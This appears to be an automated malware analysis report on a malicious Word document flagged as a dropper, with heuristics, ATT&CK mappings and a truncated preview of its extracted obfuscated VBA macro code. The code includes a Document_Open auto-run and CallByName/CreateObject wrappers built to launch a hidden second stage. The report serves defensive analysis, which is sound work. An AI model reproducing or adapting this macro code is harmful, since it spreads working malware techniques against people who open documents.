MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is designed to execute code using 'CreateObject' and 'CallByName', indicating an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-1399074' further confirms its malicious nature as a dropper.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-1399074 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1399074
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15092 bytes |
SHA-256: 6744947cfdb4bc20575fb3dc126d6ef49157eddcaa3c573f644f6480c2fb204e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const PuZSwihqCFjom As Variant = "gz7Yx"
Private Sub Document_Open()
XY5rIEc4.DDMQoRjo6d
End Sub
Public Sub ATgjAr()
Dim QfScd5 As Object
Dim ihO3wnp As Variant, fxSEPoPytrzV As Integer
Dim j85OvD30lz As String
On Error GoTo lRxiXYrcpKMPKS
Set QfScd5 = QDyyG4R0fcV7Y.Ir2UUDUGwJ(FcA8Mv2HeOONFy(Cx2B5Q1t.RqMXIWa, 44), XY5rIEc4.y4dW4Paqca)
fxSEPoPytrzV = scPZ0Cvkp.CE24LeC5(QfScd5, FcA8Mv2HeOONFy(Cx2B5Q1t.fHKmDaxJrbZe, 93))
If fxSEPoPytrzV <> XY5rIEc4.AHostVAcVzK21 Then
Err.Raise Number:=1
End If
ihO3wnp = scPZ0Cvkp.CE24LeC5(QfScd5, FcA8Mv2HeOONFy(Cx2B5Q1t.oNzdMi, 296))
j85OvD30lz = XY5rIEc4.K8VFl2 & XY5rIEc4.agKo5o6wW & XY5rIEc4.AM1G8nMHxwsb
QDyyG4R0fcV7Y.RHIsQQXzamNRtmh j85OvD30lz, ihO3wnp
QDyyG4R0fcV7Y.v1ARktfJL2lUt j85OvD30lz
Exit Sub
lRxiXYrcpKMPKS:
End Sub
Private Sub GoFHyxrJqNmubUjdC()
wrlqTivs
End Sub
Attribute VB_Name = "Cx2B5Q1t"
Attribute VB_Base = "0{EF05BECA-CAD1-41B1-9035-B643BA189533}{4331C64B-FB9F-492B-83FB-0F4EDA4065AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "scPZ0Cvkp"
Public Function zJCApTh7DPrJc66(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal lYBRuHlQQ As Variant, ByVal xTGXWi As Variant, ByVal kijgCNlt3I As Variant) As Variant
zJCApTh7DPrJc66 = CallByName(e8BNpUbbbycg, KR7UG5nruz, 1, lYBRuHlQQ, xTGXWi, kijgCNlt3I)
End Function
Public Function uikE875oaX8q1(ByVal ysmMKr As String) As Object
Set uikE875oaX8q1 = CreateObject(ysmMKr)
End Function
Public Sub GY9zkfrKLHTQzgN(ByVal e8BNpUbbbycg As Variant, ByVal KR7UG5nruz As Variant, ByVal lYBRuHlQQ As Variant, ByVal xTGXWi As Variant)
CallByName e8BNpUbbbycg, KR7UG5nruz, 1, lYBRuHlQQ, xTGXWi
End Sub
Public Function l7aZ8S3X(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal zTdHsv As Variant)
l7aZ8S3X = CallByName(e8BNpUbbbycg, KR7UG5nruz, 1, zTdHsv)
End Function
Public Function uoYPb1(ByVal MEy3tFNOhauiqcc As Variant) As Variant
Set uoYPb1 = GetObject(MEy3tFNOhauiqcc)
End Function
Public Function aWTQyzC2iOKD(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal zTdHsv As Variant) As Variant
Set aWTQyzC2iOKD = CallByName(e8BNpUbbbycg, KR7UG5nruz, 1, zTdHsv)
End Function
Public Function CE24LeC5(ByVal e8BNpUbbbycg As Object, ByVal jKJo3WQIsbgPiH As String) As Variant
CE24LeC5 = CallByName(e8BNpUbbbycg, jKJo3WQIsbgPiH, 2)
End Function
Public Sub tmQN9NYLgV8(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String)
CallByName e8BNpUbbbycg, KR7UG5nruz, 1
End Sub
Public Sub nVpZOWq(ByVal e8BNpUbbbycg As Object, ByVal KR7UG5nruz As String, ByVal zTdHsv As Variant)
CallByName e8BNpUbbbycg, KR7UG5nruz, 1, zTdHsv
End Sub
Public Sub GnKAw3jL7nRs2()
Application.Run XY5rIEc4.VKUZi2aE6IIf
End Sub
Public Sub m2zgLvK1NE3B(ByVal e8BNpUbbbycg As Object, ByVal jKJo3WQIsbgPiH As String, ByVal rlcX0yZ As Variant)
CallByName e8BNpUbbbycg, jKJo3WQIsbgPiH, 4, rlcX0yZ
End Sub
Attribute VB_Name = "Xan5IzwvjavTxhL"
Private Const RmFSdO As Variant = "s1izxV7um9oybQD"
Private Const REvwCcn As String = "VHfm86dZO1XpDIv7h"
Public Function ltqsiEr() As Boolean
Dim hAA78SvDl6kABD As String
Dim tVMG80njxnyN As Object
Dim H4SLWr6iMWR As Variant
Dim PFCaQuBtNEEgT As Variant
For Each tVMG80njxnyN In QDyyG4R0fcV7Y.FAWX9dhAprU
H4SLWr6iMWR = scPZ0Cvkp.CE24LeC5(tVMG80njxnyN, XY5rIEc4.FcA8Mv2HeOONFy(Cx2B5Q1t.gZcVwcHjBhR, 244))
hAA78SvDl6kABD = scPZ0Cvkp.CE24LeC5(tVMG80njxnyN, XY5rIEc4.FcA8Mv2HeOONFy(Cx2B5Q1t.UiWfLQYwq, 72))
For Each PFCaQuBtNEEgT In XY5rIEc4.JWv4tQbtgpqOX
If XY5rIEc4.HBIocv(H4SLWr6iMWR, PFCaQuBtNEEgT) Or XY5rIEc4.HBIocv(hAA78SvDl6kABD, PFCaQuBtNEEgT) Then GoTo sXsfci
Next
Next
ltqsiEr = Fals
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.